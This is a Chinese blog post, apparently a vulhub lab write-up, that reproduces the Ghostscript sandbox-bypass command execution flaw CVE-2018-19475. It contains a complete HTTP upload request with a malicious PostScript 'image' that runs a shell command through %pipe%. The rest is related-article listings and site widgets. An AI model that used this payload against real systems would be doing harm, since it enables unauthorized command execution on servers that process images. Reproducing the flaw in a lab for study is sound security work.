GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475)

最新推荐文章于 2024-07-09 17:41:13 发布
最新推荐文章于 2024-07-09 17:41:13 发布
阅读量558 收藏 1
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/117622061
版权
这篇博客介绍了Ghostscript 9.26之前的版本中存在一个安全漏洞,该漏洞源于psi/zdevice2.c文件的安全特征问题。攻击者可以利用此漏洞通过上传特制的POC图片文件执行命令。虽然通常情况下不会直接回显数据,但可以通过其他方式验证漏洞是否被利用。内容涉及到PostScript解析器、安全漏洞、命令注入和漏洞验证方法。
摘要由CSDN通过智能技术生成

漏洞背景

Artifex Software Ghostscript是美国Artifex Software公司的一款开源的PostScript(一种用于电子产业和桌面出版领域的页面描述语言和编程语言)解析器。该产品可显示Postscript文件以及在非Postscript打印机上打印Postscript文件。 Artifex Software Ghostscript 9.26之前版本中的psi/zdevice2.c文件存在安全特征问题漏洞。该漏洞是源于网络系统或产品中缺少身份验证、访问控制、权限管理等安全措施。

漏洞复现

将POC作为图片上传,将执行命令id > /tmp/success && cat /tmp/success

POST /index.php HTTP/1.1
Host: your_ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryukZmnyhO
Content-Length: 279

------WebKitFormBoundaryukZmnyhO
Content-Disposition: form-data; name="file_upload"; filename="1.jpg"
content-Type="image/png"

%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file
------WebKitFormBoundaryukZmnyhO--

在这里插入图片描述
通常真实情况下是不会回显数据的,需要其他方式去验证.

小 白 萝 卜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475
qq_51577576的博客
12-17 712
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475 CVE-2018-19475CVE-2018-16509的变体,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令
Node.js-使用Ghostscript命令优化PDF文件大小
08-10
最后,我们调用`gs.run`执行Ghostscript命令,并确保在完成后调用`gs.shutdown`关闭Ghostscript进程。 在实际项目中,你可能需要根据具体需求调整优化参数。例如,如果你的PDF包含大量高分辨率的图像,你可能需要...
GhostScript 沙箱绕过命令执行漏洞CVE-2018-19475)复现
HEAVEN569的博客
06-28 466
GhostScript 沙箱绕过命令执行漏洞CVE-2018-19475)复现
Ghostscript库中的RCE漏洞已遭利用
最新发布
smellycat000的专栏
07-09 153
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士广泛用于 Linux 系统上的文档转换工具集Ghostscript中存在一个远程代码执行漏洞,目前已遭利用。Ghostscript 预装在很多Linux发行版本中,且用于多种文档转换软件中如 ImageMagick、LibreOffice、GIMP、Inkscape、Scribus和CUPS 打印系统中。该漏洞编号为CVE-2024-29510,...
GhostScript 沙箱绕过命令执行漏洞
m0_63241485的博客
08-26 1131
当dorestore退出时,LockFilePermissions的值被设置为falsea = blob;随后使用.setuserparams方法还原LockFilePermissionsa = blob;但是,在restore之后,.setuserparams方法执行之前,可能会抛出StackOverflowError栈溢出错误,不会重置“LockFilePermissions”。从而导致绕过-dSAFER。...
buuctf [GhostScript]CVE-2018-19475
qq_1873822的博客
03-30 435
漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 ./psi/zdevice2.c文件存在安全特征问题漏洞。该漏洞是源于网络系统或产品中缺少身份验证、访问控制、权限
ghostscript-9.26-bin
10-12
标题中的"ghostscript-9.26-bin"指的是Ghostscript的9.26版本的二进制发行版,这个版本包含了可执行文件和其他必要的动态链接库(.so文件),使得用户能够在不同的平台上运行和处理PostScript和PDF文件。 ...
ghostscript-9.02.tar.gz
09-03
ghostscript-9.02,用于linux中pdf转图片工具
使用Ghostscript命令优化PDF-Node.js开发
05-27
gsx-pdf-optimize使用Ghostscript gsx命令优化PDF,例如test / raw_pdf.pdf(由Figma生成)从3.7 MB扩展到642 KB。 安装首先,请确保已在命令中安装了Ghostscript。 在gsx-pdf-optimize使用Ghostscript gsx命令优化...
exportfig-ghostscript-xpdftools.rar
06-05
export_fig可以使matlab更方便的输出图像,如去除白边,保真等,此包提供配置export_fig所需的软件。我写的配套的教程如下:https://blog.csdn.net/Liangontheway/article/details/90903348
GhostScript 沙箱绕过命令执行漏洞 CVE-2018-19475 漏洞复现
ADummy的博客
02-24 512
GhostScript 沙箱绕过命令执行漏洞CVE-2018-19475) by ADummy 0x00利用路线 ​ 构造poc png图片—>上传图片—>有回显命令执行 0x01漏洞介绍 ​ 2018年底来自Semmle Security Research Team的Man Yue Mo发表了CVE-2018-16509漏洞的变体CVE-2018-19475,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。 0x02漏洞复现 将P
Buuctf [GhostScript]CVE-2018-19475
ch258563的博客
05-30 158
Buuctf [GhostScript]CVE-2018-19475
复现vulhub中ghostscriptCVE-2018-19475漏洞
YX_zjp的博客
03-07 763
2018年底来自Semmle Security Research Team的Man Yue Mo发表了CVE-2018-16509漏洞的变体CVE-2018-19475,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。5、上传poc.png,点击“提交查询”,执行命令id > /tmp/success && cat /tmp/success。GhostScript 沙箱绕过命令执行漏洞CVE-2018-19475)系统:ubuntu20.04。
【严重】Artifex Software Ghostscript 任意命令执行漏洞(POC已公开)(CVE-2023-28879)
murphysec的博客
04-18 1344
Artifex Software Ghostscript是美国Artifex Software公司的一款开源的PostScript解析器。 Artifex Ghostscript 10.01.0及之前版本中,如果写入缓冲区的数据比总长度少一个字节,则尝试写入转义字符,导致两个字节被写入。攻击者可通过泄露堆中path_control_active地址,覆写无效字节以禁用沙箱,进而通过PostScript的%pipe%执行任意命令。该漏洞影响 BCPEncode, BCPDecode, TBCPEncode,
GhostScript 沙箱绕过命令执行漏洞CVE-2019-6116)
黑白的博客
12-23 828
声明 好好学习,天天向上 漏洞描述 2019年1月23日晚,Artifex官方在ghostscriptf的master分支上提交合并了多达6处的修复。旨在修复 CVE-2019-6116 漏洞,该漏洞由 Google 安全研究员 taviso 于2018年12月3日提交。该漏洞可以直接绕过 ghostscript安全沙箱,导致攻击者可以执行任意命令/读取任意文件。 ghostscript应用广泛,ImageMagick、python-matplotlib、libmagick 等图像处理应用均有引用。 影
php沙盒绕过,GhostScript 沙箱绕过命令执行漏洞CVE-2018-19475
weixin_30317869的博客
03-21 229
POST /index.php HTTP/1.1Host: targetAccept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: close...
Buuctf GhostScript 沙箱绕过命令执行漏洞CVE-2019-6116)
ch258563的博客
05-30 540
Buuctf GhostScript 沙箱绕过命令执行漏洞CVE-2019-6116)
vulhub漏洞复现十七_GhostScript
weixin_44193247的博客
01-28 933
vulhub漏洞复现练习篇
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值